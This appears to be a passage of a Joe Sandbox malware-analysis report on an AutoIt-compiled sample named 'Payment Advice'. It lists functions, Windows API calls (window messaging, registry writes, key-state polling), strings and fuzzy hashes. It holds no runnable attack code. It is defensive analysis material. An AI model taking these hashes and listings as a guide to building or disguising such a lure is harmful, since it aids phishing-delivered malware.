Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: d86f79e73e9793b349dc929ec2904cae1c499a7699cbfb10b0617db3a8c271c8
Instruction ID: a74a860f1667032a3c5951181fd1da00ad011899dbac0660e6f6b57e610dcd08
Opcode Fuzzy Hash: d86f79e73e9793b349dc929ec2904cae1c499a7699cbfb10b0617db3a8c271c8
Instruction Fuzzy Hash: E8514C71940208BFDF119FA9DC48EAE7F7AFB08324F105655FA15AB2A1D7719A40CF60

Function 005EB6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 005EB7B0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005EB7C1
CharNextW.USER32(0000014E), ref: 005EB7F0
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 005EB831
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 005EB847
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005EB858
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 005EB875
SetWindowTextW.USER32(?,0000014E), ref: 005EB8C7
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 005EB8DD
SendMessageW.USER32(?,00001002,00000000,?), ref: 005EB90E
_memset.LIBCMT ref: 005EB933
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 005EB97C
_memset.LIBCMT ref: 005EB9DB
SendMessageW.USER32 ref: 005EBA05
SendMessageW.USER32(?,00001074,?,00000001), ref: 005EBA5D
SendMessageW.USER32(?,0000133D,?,?), ref: 005EBB0A
InvalidateRect.USER32(?,00000000,00000001), ref: 005EBB2C
GetMenuItemInfoW.USER32(?), ref: 005EBB76
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 005EBBA3
DrawMenuBar.USER32(?), ref: 005EBBB2
SetWindowTextW.USER32(?,0000014E), ref: 005EBBDA

Strings

0, xrefs: 005EBB4F

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 2da66517afc0489240b98dfeb19f572c9dfc8312a0e8856ae9eb0ba65c8adcd8
Instruction ID: 1d5b6f2ee4d1929b2275b5767a6d064796c36bf5c2f6c92d722f364527e18a5c
Opcode Fuzzy Hash: 2da66517afc0489240b98dfeb19f572c9dfc8312a0e8856ae9eb0ba65c8adcd8
Instruction Fuzzy Hash: 12E1BE71900259ABEF248FA2CC84EEF7F78FF05711F108156F999AA290D7708A41CF60

Function 00582EC0 Relevance: 37.1, APIs: 8, Strings: 13, Instructions: 346COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00582F7A
IsWindow.USER32(?), ref: 005F22FD

Strings

LAST, xrefs: 005F20B6
REGEXPCLASS, xrefs: 005F2149
CLASS, xrefs: 005F2128
ALL, xrefs: 005F2264
T+c, xrefs: 005F220E
REGEXPTITLE, xrefs: 005F20F8
L+c, xrefs: 005F21B2
P+c, xrefs: 005F21E0
H+c, xrefs: 005F2184
INSTANCE, xrefs: 005F223C
ACTIVE, xrefs: 005F20CC
TITLE, xrefs: 005F2292
HANDLE, xrefs: 005F20E2

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Window$Foreground
String ID: ACTIVE$ALL$CLASS$H+c$HANDLE$INSTANCE$L+c$LAST$P+c$REGEXPCLASS$REGEXPTITLE$T+c$TITLE
API String ID: 62970417-436961509
Opcode ID: fd04726946bdf5d63d92ce3a06a3e66200435660b8dd227fbbdad5c0aeab50a0
Instruction ID: 666f64966db17710ccc96411f9c791122e8011785964c0adda27b94b2937372b
Opcode Fuzzy Hash: fd04726946bdf5d63d92ce3a06a3e66200435660b8dd227fbbdad5c0aeab50a0
Instruction Fuzzy Hash: C6D106701046479BCB04EF20C885AAAFFB5BF94344F004E1DF596A76A1DB34E99ACB91

Function 005E764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 005E778A
GetDesktopWindow.USER32 ref: 005E779F
GetWindowRect.USER32(00000000), ref: 005E77A6
GetWindowLongW.USER32(?,000000F0), ref: 005E7808
DestroyWindow.USER32(?), ref: 005E7834
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 005E785D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005E787B
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 005E78A1
SendMessageW.USER32(?,00000421,?,?), ref: 005E78B6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 005E78C9
IsWindowVisible.USER32(?), ref: 005E78E9
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 005E7904
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 005E7918
GetWindowRect.USER32(?,?), ref: 005E7930
MonitorFromPoint.USER32(?,?,00000002), ref: 005E7956
GetMonitorInfoW.USER32 ref: 005E7970
CopyRect.USER32(?,?), ref: 005E7987
SendMessageW.USER32(?,00000412,00000000), ref: 005E79F2

Strings

0, xrefs: 005E7735
(, xrefs: 005E7965
tooltips_class32, xrefs: 005E7856

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 6a23ad6cde9420a85b37c855b43cb179b4f9ef5fb0a66a78ef0310567c413c67
Instruction ID: 47eead0c9a9778de3254fdc55faa4e840485d1fda34268913ebadb45e6f7a0b3
Opcode Fuzzy Hash: 6a23ad6cde9420a85b37c855b43cb179b4f9ef5fb0a66a78ef0310567c413c67
Instruction Fuzzy Hash: E3B18D71608341AFDB04DF65C849B6ABBE5FF88310F008A1DF9999B291DB71E805CB96

Function 0059A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0059A939
GetSystemMetrics.USER32(00000007), ref: 0059A941
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0059A96C
GetSystemMetrics.USER32(00000008), ref: 0059A974
GetSystemMetrics.USER32(00000004), ref: 0059A999
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0059A9B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0059A9C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0059A9F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0059AA0D
GetClientRect.USER32(00000000,000000FF), ref: 0059AA2B
GetStockObject.GDI32(00000011), ref: 0059AA47
SendMessageW.USER32(00000000,00000030,00000000), ref: 0059AA52

Part of subcall function 0059B63C: GetCursorPos.USER32(000000FF), ref: 0059B64F
Part of subcall function 0059B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0059B66C
Part of subcall function 0059B63C: GetAsyncKeyState.USER32(00000001), ref: 0059B691
Part of subcall function 0059B63C: GetAsyncKeyState.USER32(00000002), ref: 0059B69F

SetTimer.USER32(00000000,00000000,00000028,0059AB87), ref: 0059AA79

Strings

AutoIt v3 GUI, xrefs: 0059A9F1

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 94736f28d7f4bf1752723a1cb956c5665f6fa93ef441040328103693b09a0092
Instruction ID: 0d1f8583b88b663324ecc5f5007e6091f727a08bc4b931475044379f2897c44e
Opcode Fuzzy Hash: 94736f28d7f4bf1752723a1cb956c5665f6fa93ef441040328103693b09a0092
Instruction Fuzzy Hash: CEB18C75A4020AAFDF14DFA8DC49BAE7FB6FB09314F114219FA15AB290DB74D840CB61

Function 005E3639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005E3735
RegCreateKeyExW.ADVAPI32(?,?,00000000,0061DC00,00000000,?,00000000,?,?), ref: 005E37A3
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 005E37EB
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 005E3874
RegCloseKey.ADVAPI32(?), ref: 005E3B94
RegCloseKey.ADVAPI32(00000000), ref: 005E3BA1

Strings

REG_MULTI_SZ, xrefs: 005E395C
REG_QWORD, xrefs: 005E3AE2
REG_DWORD, xrefs: 005E3A65
REG_SZ, xrefs: 005E38B2
REG_EXPAND_SZ, xrefs: 005E3811
REG_BINARY, xrefs: 005E3B2F

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 00c550d318dd944b8c0a9e5aa5ce399b163f49373455424aa9c88f61cd80cbb1
Instruction ID: 4eff4957df0b6f5efb413fd9f09b368e35c2da3c6dde196e6416156b4c5d17cc
Opcode Fuzzy Hash: 00c550d318dd944b8c0a9e5aa5ce399b163f49373455424aa9c88f61cd80cbb1
Instruction Fuzzy Hash: 1F024D756046429FCB15EF15C859A2EBBE5FF89710F04895DF98AAB3A1CB30ED01CB81

Function 005E6BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 005E6C56
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 005E6D16

Strings

SELECTINVERT, xrefs: 005E6DDE
GETSELECTED, xrefs: 005E6E3C
FINDITEM, xrefs: 005E6E81
GETTEXT, xrefs: 005E6CBF
SELECTCLEAR, xrefs: 005E6D8D
SELECT, xrefs: 005E6DA8
SELECTALL, xrefs: 005E6D75
GETSELECTEDCOUNT, xrefs: 005E6CF9
VIEWCHANGE, xrefs: 005E6ECD
ISSELECTED, xrefs: 005E6D21
GETITEMCOUNT, xrefs: 005E6C84
GETSUBITEMCOUNT, xrefs: 005E6CA1
DESELECT, xrefs: 005E6DFC

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: f3f14c28f5f86350d01b445f28e9e5817bf6a511c1ec866364e24ac0a7278bd9
Instruction ID: 08e4c79be8a303f67e416358da67e4ddd9b1db19bf65f5cc9f820e0b084adf42
Opcode Fuzzy Hash: f3f14c28f5f86350d01b445f28e9e5817bf6a511c1ec866364e24ac0a7278bd9
Instruction Fuzzy Hash: BAA174342043829FCB18EF11C956A6ABFA6BF94394F144968F8A65B3D2DF70EC05CB51

Function 005BCF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 005BCF91
__swprintf.LIBCMT ref: 005BD032
_wcscmp.LIBCMT ref: 005BD045
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 005BD09A
_wcscmp.LIBCMT ref: 005BD0D6
GetClassNameW.USER32(?,?,00000400), ref: 005BD10D
GetDlgCtrlID.USER32(?), ref: 005BD15F
GetWindowRect.USER32(?,?), ref: 005BD195
GetParent.USER32(?), ref: 005BD1B3
ScreenToClient.USER32(00000000), ref: 005BD1BA
GetClassNameW.USER32(?,?,00000100), ref: 005BD234
_wcscmp.LIBCMT ref: 005BD248
GetWindowTextW.USER32(?,?,00000400), ref: 005BD26E
_wcscmp.LIBCMT ref: 005BD282

Strings

%s%u, xrefs: 005BD02C

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
String ID: %s%u
API String ID: 3119225716-679674701
Opcode ID: ddd9f51bdc0a362416509d5cd9b329067723dfd11b8f7bc0b0bb4be2cdfecdbe
Instruction ID: ab853359089ebf98c7622ca65a3e2cbfc767c91e0193c831f753d601eaa78f21
Opcode Fuzzy Hash: ddd9f51bdc0a362416509d5cd9b329067723dfd11b8f7bc0b0bb4be2cdfecdbe
Instruction Fuzzy Hash: AFA1CD71604746AFD715DF64C888FEAFBA9FF44354F008629F99992180EB30FA45CBA1

Function 005BD8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 005BD8EB
_wcscmp.LIBCMT ref: 005BD8FC
GetWindowTextW.USER32(00000001,?,00000400), ref: 005BD924
CharUpperBuffW.USER32(?,00000000), ref: 005BD941
_wcscmp.LIBCMT ref: 005BD95F
_wcsstr.LIBCMT ref: 005BD970
GetClassNameW.USER32(00000018,?,00000400), ref: 005BD9A8
_wcscmp.LIBCMT ref: 005BD9B8
GetWindowTextW.USER32(00000002,?,00000400), ref: 005BD9DF
GetClassNameW.USER32(00000018,?,00000400), ref: 005BDA28
_wcscmp.LIBCMT ref: 005BDA38
GetClassNameW.USER32(00000010,?,00000400), ref: 005BDA60
GetWindowRect.USER32(00000004,?), ref: 005BDAC9

Strings

@, xrefs: 005BD8C6
ThumbnailClass, xrefs: 005BD9B3, 005BDA33

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: f70c9e12c9ee804f00faba0e012b2dc87cf29a38c1dc69e34a898587b545ffeb
Instruction ID: 4f2413a09f05b30753ecc08572589c15c281cff83d9170a0d99669dfa1880419
Opcode Fuzzy Hash: f70c9e12c9ee804f00faba0e012b2dc87cf29a38c1dc69e34a898587b545ffeb
Instruction Fuzzy Hash: A5817C310083069BDB15DF54C885BAA7FE8FF84714F18846AFD899A096EB34ED45CBB1

Function 005BD6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 005BD753

Strings

[CLASS:, xrefs: 005BD7A3
REGEXP=, xrefs: 005BD768
CLASSNAME=, xrefs: 005BD790
[ACTIVE, xrefs: 005BD740
HANDLE=, xrefs: 005BD74C
[LAST, xrefs: 005BD800
[ALL, xrefs: 005BD7F9
LAST, xrefs: 005BD718
ALL, xrefs: 005BD7E7
[HANDLE:, xrefs: 005BD75F
ACTIVE, xrefs: 005BD72E
[REGEXPTITLE:, xrefs: 005BD77B

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 94407ce16d8c794e1b55638919ab92a8f24c1063249398bbf035a6fd0e7003ca
Instruction ID: 3781cb980de4292385c7b9eb9d4c7a6ce0f3996d6c70781fd5f7fcf1e8ae977e
Opcode Fuzzy Hash: 94407ce16d8c794e1b55638919ab92a8f24c1063249398bbf035a6fd0e7003ca
Instruction Fuzzy Hash: 2D314B31644207AADB14FB60DD67FEEBFB6BF60715F600129F842B10D1FF61AA0486A5

Function 005BEA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 005BEAB0
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 005BEAC2
SetWindowTextW.USER32(?,?), ref: 005BEAD9
GetDlgItem.USER32(?,000003EA), ref: 005BEAEE
SetWindowTextW.USER32(00000000,?), ref: 005BEAF4
GetDlgItem.USER32(?,000003E9), ref: 005BEB04
SetWindowTextW.USER32(00000000,?), ref: 005BEB0A
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 005BEB2B
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 005BEB45
GetWindowRect.USER32(?,?), ref: 005BEB4E
SetWindowTextW.USER32(?,?), ref: 005BEBB9
GetDesktopWindow.USER32 ref: 005BEBBF
GetWindowRect.USER32(00000000), ref: 005BEBC6
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 005BEC12
GetClientRect.USER32(?,?), ref: 005BEC1F
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 005BEC44
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 005BEC6F

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: b915a451cc7226e91e82b07f2d4d704a8b7fd893a401dbe9a79260d21012a5ac
Instruction ID: 23fae48ed37d7d5e7c8cf99df87ec1f6fac036030f47aa44704a66c6a781db41
Opcode Fuzzy Hash: b915a451cc7226e91e82b07f2d4d704a8b7fd893a401dbe9a79260d21012a5ac
Instruction Fuzzy Hash: 62513D71900709EFDB219FA8CD8ABAFBFB5FF04704F044A18E556A25A0D775B944CB10

Function 005D79B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 005D79C6
LoadCursorW.USER32(00000000,00007F00), ref: 005D79D1
LoadCursorW.USER32(00000000,00007F03), ref: 005D79DC
LoadCursorW.USER32(00000000,00007F8B), ref: 005D79E7
LoadCursorW.USER32(00000000,00007F01), ref: 005D79F2
LoadCursorW.USER32(00000000,00007F81), ref: 005D79FD
LoadCursorW.USER32(00000000,00007F88), ref: 005D7A08
LoadCursorW.USER32(00000000,00007F80), ref: 005D7A13
LoadCursorW.USER32(00000000,00007F86), ref: 005D7A1E
LoadCursorW.USER32(00000000,00007F83), ref: 005D7A29
LoadCursorW.USER32(00000000,00007F85), ref: 005D7A34
LoadCursorW.USER32(00000000,00007F82), ref: 005D7A3F
LoadCursorW.USER32(00000000,00007F84), ref: 005D7A4A
LoadCursorW.USER32(00000000,00007F04), ref: 005D7A55
LoadCursorW.USER32(00000000,00007F02), ref: 005D7A60
LoadCursorW.USER32(00000000,00007F89), ref: 005D7A6B
GetCursorInfo.USER32(?), ref: 005D7A7B

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 4f16b115893c7ef1c02c6ef149c6cf2d6c4268cc6704c9837f5cac611a891aad
Instruction ID: af59fb6c2a77890d3da789d4483a204cc0a58b9ecb60a95b5fc468fde9e7023a
Opcode Fuzzy Hash: 4f16b115893c7ef1c02c6ef149c6cf2d6c4268cc6704c9837f5cac611a891aad
Instruction Fuzzy Hash: 8E31E7B1D4831E6ADB609FBA8C8995FBFE8FF04750F504527E50DE7280EA78A5008F91

Function 0058C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON

Download Yara Rule

APIs

Part of subcall function 0059E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0058C8B7,?,00002000,?,?,00000000,?,0058419E,?,?,?,0061DC00), ref: 0059E984

Part of subcall function 0058660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005853B1,?,?,005861FF,?,00000000,00000001,00000000), ref: 0058662F

__wsplitpath.LIBCMT ref: 0058C93E

Part of subcall function 005A1DFC: __wsplitpath_helper.LIBCMT ref: 005A1E3C

_wcscpy.LIBCMT ref: 0058C953
_wcscat.LIBCMT ref: 0058C968
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0058C978
SetCurrentDirectoryW.KERNEL32(?), ref: 0058CABE

Part of subcall function 0058B337: _wcscpy.LIBCMT ref: 0058B36F

Strings

#include depth exceeded. Make sure there are no recursive includes, xrefs: 005F3098
AU3!, xrefs: 0058C90C
Unterminated string, xrefs: 005F3470
EA06, xrefs: 005F30C9
Error opening the file, xrefs: 005F30B4, 005F313D
Bad directive syntax error, xrefs: 005F3429
>>>AUTOIT SCRIPT<<<, xrefs: 005F311B

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2258743419-1018226102
Opcode ID: b18543f3607defdbdb4bdfbd19db75736bf3b4e24bec257f2b4501c57176e1fc
Instruction ID: 8b31c18e425ee354b0666787423c91628211235bd43bb475f59ecafedfe26c1d
